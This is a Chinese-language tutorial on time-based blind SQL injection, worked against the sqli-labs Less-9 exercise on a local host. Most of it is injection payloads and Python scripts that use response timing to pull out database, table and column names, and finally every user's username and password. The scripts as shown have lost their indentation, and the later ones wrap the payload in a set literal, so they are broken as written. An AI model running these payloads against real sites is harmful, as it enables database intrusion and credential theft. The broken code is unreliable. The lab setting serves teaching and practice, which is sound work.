目录
1.时间盲注
时间盲注是指基于时间的盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。
2使用场景
- 页面没有回显位置(联合注入无法使用)
- 页面不显示数据库的报错信息(报错注入无法使用)
- 无论成功还是失败,页面只响应一种结果(布尔盲注无法使用)
3.步骤
3.1判断注入点
?id=1 and if(1=1,sleep(3),1)--+
?id=1' and if(1=1,sleep(3),1)--+
?id=1" and if(1=1,sleep(3),1)--+
进行多次尝试,如果页面沉睡3秒,说明存在注入点
3.2爆数据库名
?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(3),1)--+
如果数据库名的第一个字符的ascii码值等于115,则页面沉睡3秒,如果数据库名的第一个字符的ascii码值不等于115,则页面不沉睡。
根据结果得出数据库第一个字符为s
我们可以编写一个简单的python脚本就可以爆破出数据库名
python
import time
import requests
url = 'http://127.0.0.1/sqli-labs-master/less-9/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)
上述代码使用二分法来提高效率
根据运行结果得出数据库名为'security'
3.3爆表名
mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。
在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .
这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替
sys.schema_auto_increment_columns
sys.schema_table_statistics_with_buffer
mysql.innodb_table_stats
mysql.innodb_table_index
python
?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=99,sleep(5),1)--+
此时页面没有沉睡,说明表名的第一个字符的ascii码不为99
我们可以编写一个简单的python脚本就可以爆破出所有的表名
python
import time
import requests
url = 'http://127.0.0.1/sqli-labs-master/less-9/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload ={
"1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
}
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)
根据运行结果得出表名为emails,referers,uagents,users
3.4爆字段名
根据表名知道可能用户的账户和密码是在users表中,接下来我们就是得到该表下的字段名以及内容
同样使用python脚本来爆破出字段名,只需将刚才的python脚本中的payload变换一下
python
import time
import requests
url = 'http://127.0.0.1/sqli-labs-master/less-9/index.php'
def inject_database(url):
name = ''
for i in range(1, 20):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload ={
"1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
}
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)
根据运行结果得出字段名为id,username,password
3.5查询数据
python
import time
import requests
url = 'http://127.0.0.1/sqli-labs-master/less-9/index.php'
def inject_database(url):
name = ''
for i in range(1, 200):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload ={
"1' and if(ascii(substr((select group_concat(username,id,password) from users), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
}
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
end_time = time.time()
if end_time - start_time >= 1:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
name = name + chr(mid)
print(name)
inject_database(url)
这样我们就爆出各个用户的账号密码了,本次时间盲注到此结束。